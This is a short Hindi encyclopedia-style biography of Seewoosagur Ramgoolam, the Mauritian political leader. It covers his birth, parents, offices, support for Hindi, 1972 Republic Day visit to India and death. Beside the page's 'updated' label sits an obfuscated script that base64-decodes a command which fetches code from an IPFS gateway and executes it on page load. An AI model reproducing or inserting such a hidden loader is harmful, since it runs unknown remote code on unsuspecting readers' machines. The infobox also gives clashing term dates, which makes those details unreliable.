शिवसागर रामगुलाम

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
शिवसागर रामगुलाम
शिवसागर रामगुलाम
पूरा नाम शिवसागर रामगुलाम
जन्म 18 सितम्बर, 1900
जन्म भूमि केवाल नगर, ब्रिटिश मॉरीशस
मृत्यु 15 दिसम्बर, 1985
मृत्यु स्थान पोर्ट लुइस, मॉरीशस
अभिभावक पिता- मोहित रामगुलाम,

माता- बासमती रामचरन

प्रसिद्धि मॉरीशस के प्रसिद्ध राजनीतिज्ञ
कार्य काल प्रधानमंत्री- 1961 - 1982,

मुख्यमंत्री - 1961 - 1968, गवर्नर-जनरल- 1983 - 1985

अन्य जानकारी शिवसागर रामगुलाम ने ही सर्वप्रथम विश्व हिन्दी सचिवालय की स्थापना का विचार दिया था।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

शिवसागर रामगुलाम (अंग्रेज़ी: Seewoosagur Ramgoolam; जन्म- 18 सितम्बर, 1900, केवाल नगर, ब्रिटिश मॉरीशस; मृत्यु- 15 दिसम्बर, 1985, पोर्ट लुइस, मॉरीशस) मॉरीशस के प्रथम मुख्यमंत्री, प्रधानमंत्री एवं छठे गवर्नर-जनरल थे।

परिचय

शिवसागर रामगुलाम का जन्म 18 सितम्बर, 1900 को केवाल नगर, ब्रिटिश मॉरीशस में हुआ था। ये 1961 से 1982 तक प्रधानमन्त्री पद पर रहे। शिवसागर रामगुलाम को उनके माता-पिता बचपन में 'केवल' कहकर बुलाते थे। इनके पिता का नाम मोहित रामगुलाम था जो भारतीय प्रवासी श्रमिक थे। शिवसागर रामगुलाम की माता का नाम बासमती रामचरन था। ये हिन्दू धर्म के अनुयायी, हिन्दी भाषा के पक्षधर और भारतीय संस्कृति के पोषक थे। उनके कार्यकाल में हिन्दी के पठन-पाठन में बहुत प्रगति हुई। विपरीत परिस्थितियों और अभाव के रहते हुए भी उन्होंने हिन्दी के विकास में कोई कमी नहीं रखी। उन्होने ही सर्वप्रथम विश्व हिन्दी सचिवालय की स्थापना का विचार दिया था। शिवसागर रामगुलाम मॉरीशस के प्रथम मुख्यमंत्री तथा छठे गवर्नर-जनरल थे।

भारत में आंमत्रित

वर्ष 1972 में शिवसागर रामगुलाम को भारत के गणतंत्र दिवस पर मुख्य अतिथि के रूप में बुलाया गया था।

निधन

शिवसागर रामगुलाम का निधन 15 दिसम्बर, 1985 को पोर्ट लुइस, मॉरीशस में हुआ था।

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख